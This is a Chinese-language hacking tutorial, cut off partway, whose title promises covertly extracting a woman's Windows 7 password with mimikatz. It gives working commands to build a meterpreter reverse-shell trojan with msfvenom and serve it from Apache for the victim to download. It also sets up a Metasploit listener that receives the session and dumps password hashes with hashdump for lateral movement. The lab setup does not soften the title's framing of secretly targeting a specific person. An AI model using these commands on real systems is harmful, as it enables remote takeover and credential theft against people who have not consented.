内网渗透神器：使用mimikatz悄悄提取妹子Win7密码 _mimikatz

在kali渗透之内网渗透中，黑客都会想方设法在目标设备中获取重要的文件或资料，其中获得密码就是一件重要的事！小白学习白帽黑客kali渗透，前往下方专栏即可！

什么是mimikatz之前课程讲解过，xp系统的SAM和SYSTEM文件是可以在备份文件repair中进行有权提取的，但是Win7系统并没有这个备份目录，更无法直接从system32/config下提取SAM和SYSTEM！
既然不能提取，我们就使用特殊的工具来直接打入目标系统中，进行越权提取！所以这里要用到法国小伙编写的一款神器mimikatz，将它上传到目标系统中，进而直接从目标系统中破解出明文密码！

文章插图

获得meterpreter会话有人问，我都进入对方电脑了，还要密码干嘛？这里获得的密码有助于横向渗透，一般开机密码，是打开其他局域网电脑的钥匙，更是电脑某些服务的登陆密码，所以这些凭证很重要！
环境：

使用kali-2020，建议进入root！（输入su，输入密码即可！）
使用win7靶机
使用meterpreter建立的会话获得远程windows的SAM文件！

这种方式适用于测试的靶机已经运行了你的免杀木马可执行载荷，也就说使用我们的kali已经获得了靶机的meterpreter会话！
使用msfvenom生成windows有效载荷（一般木马），kali终端下输入：
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.206 LPORT=8888 -f exe > test.exeLHOST是你kali的桥接网络IP；LPORT随便设置，只要不和其他冲突即可。

文章插图

将主目录下生成的可执行木马载荷放到kali的/var/www/html中，并且删除html目录下.html为后缀的文件（没有就不用管！）

文章插图

开启kali的Apache2服务，在终端中输入：
service apache2 startApache2可以提供基本的web服务，也就是说远程的靶机可以访问kali的ip就可以自动访问kali的/va/www/html/下的文件，进行访问下载！Apache2此时就相当于一个小型服务器！

文章插图

win7靶机（桥接网络）浏览器访问：192.168.31.206，然后选中test.exe.进行下载到桌面。

文章插图

kali，启动metasploit工具，并设置监听：
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.31.206set lport 8888run

文章插图

既然已经设置了监听，我们直接去win7模拟运行有效载荷test.exe，然后就会看到kali的metasploit就会收到会话！

文章插图

我们已经获得了win7靶机的meterpreter会话，现在我们可以通过一个meterpreter命令"hashdump"就可以直接下载win7靶机的hash文件，这里获取的不是被二次加密的SAM文件，而是自动获取win7被解密后的SAM文件形成的hash值！
但是我们首先需要看下当前获得的会话是什么权限？输入"getuid"